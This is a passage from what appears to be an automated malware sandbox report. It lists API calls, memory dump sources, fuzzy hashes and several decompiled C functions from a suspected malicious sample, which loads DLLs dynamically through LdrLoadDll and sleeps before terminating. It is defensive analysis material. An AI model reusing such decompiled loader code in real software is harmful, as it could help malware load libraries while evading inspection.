            0x004019b6
            0x004019b8
            0x004019bb
            0x004019be
            0x004019bf
            0x004019c0
            0x004019c0
            0x004019c9
            0x004019e8
            0x004019f9

            APIs
            • Sleep.KERNELBASE(00001388), ref: 004019A1
            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9
            Memory Dump Source
            • Source File: 00000015.00000002.405212543.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: ProcessSleepTerminate
            • String ID:
            • API String ID: 417527130-0
            • Opcode ID: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
            • Instruction ID: c7dbb5b86db80192b1cd6b67b95130a9e8bba6362884e51d04f8a5ef40e6dacf
            • Opcode Fuzzy Hash: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
            • Instruction Fuzzy Hash: A50144F1208205FBEB005AD59DA2E7B3668AB01715F20013BBA03790F1D57D9913E72B
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            APIs
            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9
            Memory Dump Source
            • Source File: 00000015.00000002.405212543.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: ProcessTerminate
            • String ID:
            • API String ID: 560597551-0
            • Opcode ID: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
            • Instruction ID: 6d9108f025a0daaf84588f91761baf46a4613dd7645499535b00fdf5ce75212c
            • Opcode Fuzzy Hash: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
            • Instruction Fuzzy Hash: 3E21D074609204EAC7156665C863FB637909B41329F60153FE9A3BE2F2C67C4487EB27
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            C-Code - Quality: 92%
            			E004027ED(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct _OBJDIR_INFORMATION _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				long _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;
				void* _t20;
				void* _t21;
				void* _t23;
				UNICODE_STRING* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;

				_t9 = 0x2824;
				_t18 =  *_t25;
				_t26 = _t25 + 4;
				E004012AB(_t9, _t16, _t18, _t20, _t21, _t23, __eflags);
				_t17 = _a4;
				_t24 =  &_v16;
				 *((intOrPtr*)(_a4 + 0xc))(_t24, _a8, 0x53);
				_t22 =  &_v8;
				_t12 = LdrLoadDll(0, 0, _t24,  &_v8);
				_t29 = _t12;
				if(_t12 != 0) {
					_v8 = 0;
				}
				_push(0x53);
				_t19 =  *_t26;
				E004012AB(0x2824, _t17, _t19, _t20, _t22, _t24, _t29);
				return _v8;
			}




















            0x00402800
            0x00402812
            0x00402815
            0x0040281f
            0x00402824
            0x00402827
            0x0040282e
            0x00402831
            0x0040283a
            0x0040283d
            0x0040283f
            0x00402841
            0x00402841
            0x00402863
            0x00402865
            0x00402872
            0x0040287e

            APIs
            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A
            Memory Dump Source
            • Source File: 00000015.00000001.392942954.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: Load
            • String ID:
            • API String ID: 2234796835-0
            • Opcode ID: 7b811dfe18a2fa04bac5265394d9a2456aa6afd5894524daffa0ad136d012fbe
            • Instruction ID: 86d1809ebd5855410281f38b9c9c6c09a144d2210cd9b7f1e60e22e0793f0f49
            • Opcode Fuzzy Hash: 7b811dfe18a2fa04bac5265394d9a2456aa6afd5894524daffa0ad136d012fbe
            • Instruction Fuzzy Hash: CD01D43BA08105E7D6007A818A4DF6A7724EB50744F20C137A6077A1C0C5FC9A07E7BB
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            C-Code - Quality: 94%
            			E0040280A(intOrPtr __ebx, HMODULE* __edi, UNICODE_STRING* __esi, void* __eflags) {
				void* __ebp;
				void* _t12;
				long _t15;
				intOrPtr _t18;
				intOrPtr _t19;
				void* _t20;
				UNICODE_STRING* _t23;
				void* _t25;
				intOrPtr* _t26;

				_t29 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				_t16 = __ebx;
				if(__eflags < 0) {
					if(__eflags >= 0) {
						__ecx = __ecx + 1;
						__eflags = __bl;
						_t12 = 0x2824;
					} else {
					}
					_t19 =  *_t26;
					_t26 = _t26 + 4;
					E004012AB(_t12, _t16, _t19, _t20, _t21, _t23, _t29);
					_t16 =  *((intOrPtr*)(_t25 + 8));
					_t23 = _t25 - 0xc;
					 *((intOrPtr*)( *((intOrPtr*)(_t25 + 8)) + 0xc))(_t23,  *((intOrPtr*)(_t25 + 0xc)), 0x53);
					_t21 = _t25 - 4;
					_t15 = LdrLoadDll(0, 0, _t23, _t25 - 4);
					_t30 = _t15;
					if(_t15 != 0) {
						 *(_t25 - 4) = 0;
					}
				}
				_push(0x53);
				_t18 =  *_t26;
				E004012AB(0x2824, _t16, _t18, _t20, _t21, _t23, _t30);
				return  *(_t25 - 4);
			}












            0x0040280a
            0x0040280a
            0x0040280a
            0x0040280a
            0x0040280b
            0x0040280d
            0x00402803
            0x00402804
            0x00402800
            0x0040280f
            0x0040280f
            0x00402812
            0x00402815
            0x0040281f
            0x00402824
            0x00402827
            0x0040282e
            0x00402831
            0x0040283a
            0x0040283d
            0x0040283f
            0x00402841
            0x00402841
            0x00402848
            0x00402863
            0x00402865
            0x00402872
            0x0040287e

            APIs
            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A
            Memory Dump Source
            • Source File: 00000015.00000001.392942954.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: Load
            • String ID:
            • API String ID: 2234796835-0
            • Opcode ID: 816e61236cf151029f9916b06356fa28e65bf4d83d8dd38ba6b14be9c999f240
            • Instruction ID: 9ca859c839910d9830ac79efeaa13c409ccf86f2f3a4ee59ee812277144ea7f3
            • Opcode Fuzzy Hash: 816e61236cf151029f9916b06356fa28e65bf4d83d8dd38ba6b14be9c999f240
            • Instruction Fuzzy Hash: B901843BA04105E7DA00BA819A4DBAE7764AB50704F10C57BE6077A1C5C6FC9607A76B
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            C-Code - Quality: 92%
            			E0040281A(void* __eax, void* __ebx, void* __edi, void* __esi) {
				long _t12;
				intOrPtr _t19;
				intOrPtr _t20;
				void* _t21;
				UNICODE_STRING* _t26;
				void* _t28;
				intOrPtr* _t30;
				intOrPtr* _t31;
				void* _t34;

				_t34 = __eax - 0x90;
				_t19 =  *_t30;
				_t31 = _t30 + 4;
				E004012AB(__eax, __ebx, _t19, _t21, __edi, __esi, _t34);
				_t17 =  *((intOrPtr*)(_t28 + 8));
				_t26 = _t28 - 0xc;
				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)), 0x53);
				_t23 = _t28 - 4;
				_t12 = LdrLoadDll(0, 0, _t26, _t28 - 4);
				_t35 = _t12;
				if(_t12 != 0) {
					 *(_t28 - 4) = 0;
				}
				_push(0x53);
				_t20 =  *_t31;
				E004012AB(0x2824, _t17, _t20, _t21, _t23, _t26, _t35);
				return  *(_t28 - 4);
			}












            0x0040281a
            0x00402812
            0x00402815
            0x0040281f
            0x00402824
            0x00402827
            0x0040282e
            0x00402831
            0x0040283a
            0x0040283d
            0x0040283f
            0x00402841
            0x00402841
            0x00402863
            0x00402865
            0x00402872
            0x0040287e

            APIs
            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A
            Memory Dump Source
            • Source File: 00000015.00000001.392942954.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: Load
            • String ID:
            • API String ID: 2234796835-0
            • Opcode ID: ef76625e9fce4a99ac1b5c6db449950ac3397aa5a53fee84dab980023b8c3a58
            • Instruction ID: 04be1964ae6a2c4a8d34668d02d656748d1177ed5934df91e255a91300bf99b4
            • Opcode Fuzzy Hash: ef76625e9fce4a99ac1b5c6db449950ac3397aa5a53fee84dab980023b8c3a58
            • Instruction Fuzzy Hash: 58F0A43AA04105D7DB00BA81CA49B9D7720AB51704F10C57BE6067A1C4C6B99707E76B
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            C-Code - Quality: 90%
            			E0040281E(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				void* __edi;
				void* _t9;
				long _t12;
				intOrPtr _t20;
				void* _t21;
				void* _t22;
				UNICODE_STRING* _t26;
				void* _t28;
				intOrPtr* _t30;

				E004012AB(_t9, __ebx, __ecx, _t21, _t22, __esi, __eflags);
				_t17 =  *((intOrPtr*)(_t28 + 8));
				_t26 = _t28 - 0xc;
				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)), _t22);
				_t23 = _t28 - 4;
				_t12 = LdrLoadDll(0, 0, _t26, _t28 - 4);
				_t34 = _t12;
				if(_t12 != 0) {
					 *(_t28 - 4) = 0;
				}
				_push(0x53);
				_t20 =  *_t30;
				E004012AB(0x2824, _t17, _t20, _t21, _t23, _t26, _t34);
				return  *(_t28 - 4);
			}












            0x0040281f
            0x00402824
            0x00402827
            0x0040282e
            0x00402831
            0x0040283a
            0x0040283d
            0x0040283f
            0x00402841
            0x00402841
            0x00402863
            0x00402865
            0x00402872
            0x0040287e

            APIs
            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A
            Memory Dump Source
            • Source File: 00000015.00000001.392942954.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: Load
            • String ID:
            • API String ID: 2234796835-0
            • Opcode ID: 65736493afcaf5b803b8217f4f0e2bcb43a663e8f28fff33dac9f311f6d1fd4a
            • Instruction ID: 3fd11184bcf92e870777245e351188805b8424fcd9c3dcde69815370b47807fd
            • Opcode Fuzzy Hash: 65736493afcaf5b803b8217f4f0e2bcb43a663e8f28fff33dac9f311f6d1fd4a
            • Instruction Fuzzy Hash: 9DF0303AA04105E7DB00BA91CA89B9E7770EB51714F10C16BE6067A1C4C6B89707E76B
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions